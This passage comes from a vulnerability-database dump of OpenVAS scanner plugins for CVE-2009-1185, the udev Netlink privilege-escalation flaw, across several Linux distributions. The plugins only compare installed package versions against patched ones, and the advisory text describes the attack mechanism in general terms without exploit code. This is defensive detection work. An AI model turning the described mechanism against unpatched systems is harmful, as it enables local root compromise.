script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 22:58:51 +0200 (Sun, 11 Oct 2009)\");\n script_cve_id(\"CVE-2009-1185\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES11: Security update for udev\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libvolume_id1\", rpm:\"libvolume_id1~128~13.2.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~128~13.2.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:39", "description": "Oracle Linux Local Security Checks ELSA-2009-0427", "cvss3": {}, "published": "2015-10-08T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2009-0427", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122494", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122494", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2009-0427.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122494\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:46:38 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2009-0427\");\n script_tag(name:\"insight\", value:\"ELSA-2009-0427 - udev security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2009-0427\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2009-0427.html\");\n script_cve_id(\"CVE-2009-1185\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~095~14.20.el5_3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~095~14.20.el5_3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~095~14.20.el5_3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:37:08", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0427.\n\nudev provides a user-space API and implements a dynamic device directory,\nproviding only the devices present on the system. udev replaces devfs in\norder to provide greater hot plug functionality. Netlink is a datagram\noriented service, used to transfer information between kernel modules and\nuser-space processes.\n\nIt was discovered that udev did not properly check the origin of Netlink\nmessages. A local attacker could use this flaw to gain root privileges via\na crafted Netlink message sent to udev, causing it to create a\nworld-writable block device file for an existing system block device (for\nexample, the root file system). (CVE-2009-1185)\n\nRed Hat would like to thank Sebastian Krahmer of the SUSE Security Team for\nresponsibly reporting this flaw.\n\nUsers of udev are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the udevd daemon will be restarted automatically.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:0427", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063828", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063828", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0427.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0427 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0427.\n\nudev provides a user-space API and implements a dynamic device directory,\nproviding only the devices present on the system. udev replaces devfs in\norder to provide greater hot plug functionality. Netlink is a datagram\noriented service, used to transfer information between kernel modules and\nuser-space processes.\n\nIt was discovered that udev did not properly check the origin of Netlink\nmessages. A local attacker could use this flaw to gain root privileges via\na crafted Netlink message sent to udev, causing it to create a\nworld-writable block device file for an existing system block device (for\nexample, the root file system). (CVE-2009-1185)\n\nRed Hat would like to thank Sebastian Krahmer of the SUSE Security Team for\nresponsibly reporting this flaw.\n\nUsers of udev are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the udevd daemon will be restarted automatically.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63828\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-1185\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0427\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0427.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#important\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~095~14.20.el5_3\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~095~14.20.el5_3\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-debuginfo\", rpm:\"udev-debuginfo~095~14.20.el5_3\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~095~14.20.el5_3\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:59", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libvolume_id1\n udev\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-11T00:00:00", "type": "openvas", "title": "SLES11: Security update for udev", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65648", "href": "http://plugins.openvas.org/nasl.php?oid=65648", "sourceData": "#\n#VID f2a20a677f8f07b34c3543e781db446f\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for udev\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libvolume_id1\n udev\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=493158\");\n script_id(65648);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 22:58:51 +0200 (Sun, 11 Oct 2009)\");\n script_cve_id(\"CVE-2009-1185\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES11: Security update for udev\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libvolume_id1\", rpm:\"libvolume_id1~128~13.2.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~128~13.2.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:36", "description": "Check for the Version of libvolume_id-095", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for libvolume_id-095 CESA-2009:0427 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:880822", "href": "http://plugins.openvas.org/nasl.php?oid=880822", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libvolume_id-095 CESA-2009:0427 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"udev provides a user-space API and implements a dynamic device directory,\n providing only the devices present on the system. udev replaces devfs in\n order to provide greater hot plug functionality. Netlink is a datagram\n oriented service, used to transfer information between kernel modules and\n user-space processes.\n\n It was discovered that udev did not properly check the origin of Netlink\n messages. A local attacker could use this flaw to gain root privileges via\n a crafted Netlink message sent to udev, causing it to create a\n world-writable block device file for an existing system block device (for\n example, the root file system). (CVE-2009-1185)\n \n Red Hat would like to thank Sebastian Krahmer of the SUSE Security Team for\n responsibly reporting this flaw.\n \n Users of udev are advised to upgrade to these updated packages, which\n contain a backported patch to correct this issue. After installing the\n update, the udevd daemon will be restarted automatically.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"libvolume_id-095 on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-April/015797.html\");\n script_id(880822);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2009:0427\");\n script_cve_id(\"CVE-2009-1185\");\n script_name(\"CentOS Update for libvolume_id-095 CESA-2009:0427 centos5 i386\");\n\n script_summary(\"Check for the Version of libvolume_id-095\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libvolume_id-095\", rpm:\"libvolume_id-095~14.20.el5_3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libvolume_id-devel-095\", rpm:\"libvolume_id-devel-095~14.20.el5_3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"udev-095\", rpm:\"udev-095~14.20.el5_3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:55:36", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0427.\n\nudev provides a user-space API and implements a dynamic device directory,\nproviding only the devices present on the system. udev replaces devfs in\norder to provide greater hot plug functionality. Netlink is a datagram\noriented service, used to transfer information between kernel modules and\nuser-space processes.\n\nIt was discovered that udev did not properly check the origin of Netlink\nmessages. A local attacker could use this flaw to gain root privileges via\na crafted Netlink message sent to udev, causing it to create a\nworld-writable block device file for an existing system block device (for\nexample, the root file system). (CVE-2009-1185)\n\nRed Hat would like to thank Sebastian Krahmer of the SUSE Security Team for\nresponsibly reporting this flaw.\n\nUsers of udev are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the udevd daemon will be restarted automatically.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:0427", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:63828", "href": "http://plugins.openvas.org/nasl.php?oid=63828", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0427.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0427 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0427.\n\nudev provides a user-space API and implements a dynamic device directory,\nproviding only the devices present on the system. udev replaces devfs in\norder to provide greater hot plug functionality. Netlink is a datagram\noriented service, used to transfer information between kernel modules and\nuser-space processes.\n\nIt was discovered that udev did not properly check the origin of Netlink\nmessages. A local attacker could use this flaw to gain root privileges via\na crafted Netlink message sent to udev, causing it to create a\nworld-writable block device file for an existing system block device (for\nexample, the root file system). (CVE-2009-1185)\n\nRed Hat would like to thank Sebastian Krahmer of the SUSE Security Team for\nresponsibly reporting this flaw.\n\nUsers of udev are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the udevd daemon will be restarted automatically.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(63828);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-1185\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0427\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0427.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#important\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~095~14.20.el5_3\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~095~14.20.el5_3\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-debuginfo\", rpm:\"udev-debuginfo~095~14.20.el5_3\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~095~14.20.el5_3\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:59", "description": "The remote host is missing an update to udev\nannounced via advisory MDVSA-2009:104.", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:104 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063917", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063917", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_104.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:104 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"udev before 1.4.1 does not verify whether a NETLINK message originates\nfrom kernel space, which allows local users to gain privileges by\nsending a NETLINK message from user space (CVE-2009-1185).\n\nThe updated packages have been patched to prevent this.\n\nAffected: Corporate 4.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:104\";\ntag_summary = \"The remote host is missing an update to udev\nannounced via advisory MDVSA-2009:104.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63917\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 16:00:35 +0200 (Tue, 05 May 2009)\");\n script_cve_id(\"CVE-2009-1185\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:104 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~068~34.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-doc\", rpm:\"udev-doc~068~34.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-tools\", rpm:\"udev-tools~068~34.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:00", "description": "The remote host is missing an update to udev\nannounced via advisory MDVSA-2009:104.", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:104 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:63917", "href": "http://plugins.openvas.org/nasl.php?oid=63917", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_104.nasl 6587 2017-07-07 06:35:35Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:104 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"udev before 1.4.1 does not verify whether a NETLINK message originates\nfrom kernel space, which allows local users to gain privileges by\nsending a NETLINK message from user space 